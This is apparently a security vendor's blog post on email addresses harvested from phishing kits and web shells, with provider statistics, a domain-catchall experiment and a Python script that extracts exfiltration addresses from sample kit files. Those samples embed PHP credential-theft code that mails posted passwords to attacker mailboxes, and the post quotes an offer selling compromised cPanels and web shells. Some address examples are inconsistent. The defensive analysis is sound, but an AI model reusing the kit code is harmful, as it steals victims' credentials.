While analyzing malware around the clock, we kept building our collection of email addresses found in malicious code. With the help of SiteLock's Sig Q Team we tripled the collection to over 3,000 malware email addresses. The data shows the email providers phishers prefer, recurring keywords in malicious email addresses, and the spoofed From: addresses used by bad actors. Finally, we took advantage of a test address and an unregistered domain to get a look at the tail end of the phishing process.
The full list of 3,060 email addresses is on GitHub and can be used as indicators of compromise, particularly for website security: the recipient address hard-coded in a phishing kit belongs to the operator, so a match in a file on a web server is a strong sign the site is hosting phishing. The list consists mainly of phishing addresses, with addresses from web shells, defacements, and other miscellaneous files rounding out the total.
The majority of the email addresses were collected from phishing infections: disposable mailboxes used to receive pilfered credentials. Below is an example of a phishing infection. It is a PHP file written or uploaded to a site that collects unwary victims' email addresses and passwords and sends them to the malicious actor's mailbox, hopful101@zoho[.]com.
Looking at the addresses, 61 percent of the 3,000, roughly three-fifths, used the gmail.com domain, clearly showing Gmail is the webmail provider phishers prefer. Other mainstream webmail services trail far behind, with all Yahoo domains at 7 percent and all Hotmail domains at 5 percent.
Of note, compared with the initial collection of 1,000 malware email addresses, Yandex use has almost doubled, from 2 percent to almost 4 percent.
One interesting observation is the proclivity of phishers to use a variant of the word 'result' in the receiving email address. There were 88 email addresses containing some form of 'result' in the collection.
Sample of Addresses Containing 'result'
Also of note is the use of 'customer-support' in the spoofed From: address of phishing mailers. There were seven such addresses.
Addresses Containing 'customer-support'
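The collection described at the start of this section and the provider and keyword breakdowns above are the kind of thing a short script can do over a directory of seized kit files. The Python below is an added example, not SiteLock's or the Sig Q Team's tooling: it pulls the exfiltration recipients and the spoofed From: addresses out of phishing-kit PHP, surfaces recipients hidden behind base64_decode(), groups recipient domains into provider families (so yahoo.co.uk and yahoo.com both count as Yahoo), and lists the 'result' spelling variants and 'customer-support' senders. The three kit fragments are constructed for illustration; every address and domain in them is hypothetical except hopful101@zoho.com, which the article names above. The provider family table and the 'result' spelling pattern are assumptions to be widened as a real collection grows.

```python
"""Added example (not SiteLock's tooling): extract exfiltration recipients
and spoofed From: senders from phishing-kit PHP, then tabulate provider
share and keyword hits the way the article does."""
import base64
import re
from collections import Counter

# A real kit carries the base64 literal; it is encoded here so the sample
# stays self-consistent. The decoded address is made up.
B64_SINK = base64.b64encode(b"resultbox2017@gmail.com").decode()

# Constructed kit fragments (hypothetical; not real malware).
SAMPLES = {
    # Plain recipient plus a spoofed From: header with a display name.
    "login.php": r'''<?php
$to = "hopful101@zoho.com";
$headers = "From: customer-support@paypal-secure.example <customer-support@paypal-secure.example>\r\n";
$message = "Email: " . $_POST['email'] . "\nPass: " . $_POST['password'] . "\n";
mail($to, "Login Result", $message, $headers);
header("Location: https://www.paypal.com/");
''',
    # Recipient hidden behind base64_decode(), a second recipient, and a
    # 'rezult' spelling variant in the local part.
    "post.php": rf'''<?php
$recipient = base64_decode("{B64_SINK}");
$send = "rezultz.orange@yandex.ru";
mail($recipient, "new result", $msg, "From: customer-support@secure-mail.example");
mail($send, "new result", $msg);
''',
    # A kit whose operator never replaced the author's placeholder sink.
    "kit_template.php": r'''<?php
$to = "results@placeholder-kit.example";
mail($to, "Rezult", $msg, "From: verify@bank.example");
''',
}

EMAIL = r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}"
EMAIL_RE = re.compile(EMAIL)
B64_RE = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
# "From: Name <addr>" or "From: addr", as written into PHP mail() headers.
FROM_RE = re.compile(r"From:\s*(?:[^<\r\n'\"]*<)?\s*(" + EMAIL + ")", re.I)
# Loose match for result/rezult/rslt spellings (assumption; widen as needed).
RESULT_RE = re.compile(r"re[sz]u?l?t|rslt", re.I)
# Provider families (assumption). A trailing dot means "prefix match".
PROVIDER_FAMILIES = {
    "gmail": ("gmail.com", "googlemail.com"),
    "yahoo": ("yahoo.", "ymail.com", "rocketmail.com"),
    "hotmail": ("hotmail.", "outlook.", "live."),
    "yandex": ("yandex.",),
}


def decode_b64_literals(src):
    """Decode every base64_decode("...") literal so hidden addresses surface."""
    decoded = []
    for m in B64_RE.finditer(src):
        try:
            decoded.append(base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
    return decoded


def extract_addresses(src):
    """Split one kit file's addresses into spoofed From: senders and the
    rest, which in a phishing kit are the exfiltration recipients."""
    text = src + "\n" + "\n".join(decode_b64_literals(src))
    spoofed = {m.group(1).lower() for m in FROM_RE.finditer(text)}
    everything = {a.lower() for a in EMAIL_RE.findall(text)}
    return {"recipients": everything - spoofed, "spoofed_from": spoofed}


def provider_of(addr):
    """Map an address to a provider family, or 'other'."""
    domain = addr.rsplit("@", 1)[1]
    for family, patterns in PROVIDER_FAMILIES.items():
        if any(domain == p or (p.endswith(".") and domain.startswith(p)) for p in patterns):
            return family
    return "other"


def provider_share(addrs):
    """Percentage of addresses per provider family, one decimal place."""
    counts = Counter(provider_of(a) for a in addrs)
    total = sum(counts.values())
    return {fam: round(100.0 * n / total, 1) for fam, n in counts.items()}


def keyword_hits(addrs, pattern):
    """Addresses whose local part matches the pattern, sorted."""
    return sorted(a for a in addrs if pattern.search(a.split("@", 1)[0]))


def analyse(samples):
    """Run extraction over every kit file and build the article's tables."""
    recipients, spoofed = set(), set()
    for src in samples.values():
        found = extract_addresses(src)
        recipients |= found["recipients"]
        spoofed |= found["spoofed_from"]
    return {
        "recipients": sorted(recipients),
        "spoofed_from": sorted(spoofed),
        "provider_share": provider_share(recipients),
        "result_variants": keyword_hits(recipients, RESULT_RE),
        "customer_support_from": keyword_hits(spoofed, re.compile("customer-support", re.I)),
    }


if __name__ == "__main__":
    for key, value in analyse(SAMPLES).items():
        print(f"{key}: {value}")
```

Splitting senders from recipients matters for the IOC list: the spoofed From: address is a lure the kit can change per campaign, while the recipient is where the operator wants the credentials to land and is what a match on a web server should key on. Pointing the script at real kit files means replacing SAMPLES with the file contents read from disk.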
A particular email address from a phishing infection caught our attention, firstname.lastname@example.org. The file was part of a L33bo phishing kit, and the address was the kit's placeholder for the To: address, the mailbox that receives the stolen credentials. We noticed the domain, l33bo.website, was unregistered, so we registered it and set up a catchall mailbox for all email to the domain.
What we found were mostly test messages from the bad actors using the kit. There were a few legitimate results from botched installs, where the operator never replaced the placeholder address; those were promptly deleted. There were also many bounces, mostly to email@example.com.
Sample of L33bo Catchall Email (Apparently researchers prefer Gmail too.)
Note the abuse email complaining that the phishing form was assaulted with foul language. We will add pagez and firstname.lastname@example.org to the malware email list after publication of this article.
One of the most interesting emails the catchall caught was a solicitation offering access to compromised cPanels and web shells. Prices were $5 for a cPanel and $4 for a web shell, with a 3-day warranty included.
Solicitation for cPanel and Web Shell Access
As ephemeral as email addresses in malware are, their value in catching existing infections and providing insight into the endpoint of a compromise can't be discounted. Aggregating this possibly overlooked data brings phishers' tactics more to light: the predominant use of Gmail shows phishers gravitate to the service like the wider public, and commonalities in recipient and spoofed From: addresses can be gleaned. And an unexpected insight emerged from the simple registration of a domain. SiteLock will continue to improve its technology and threat intelligence by finding new ways to look at data.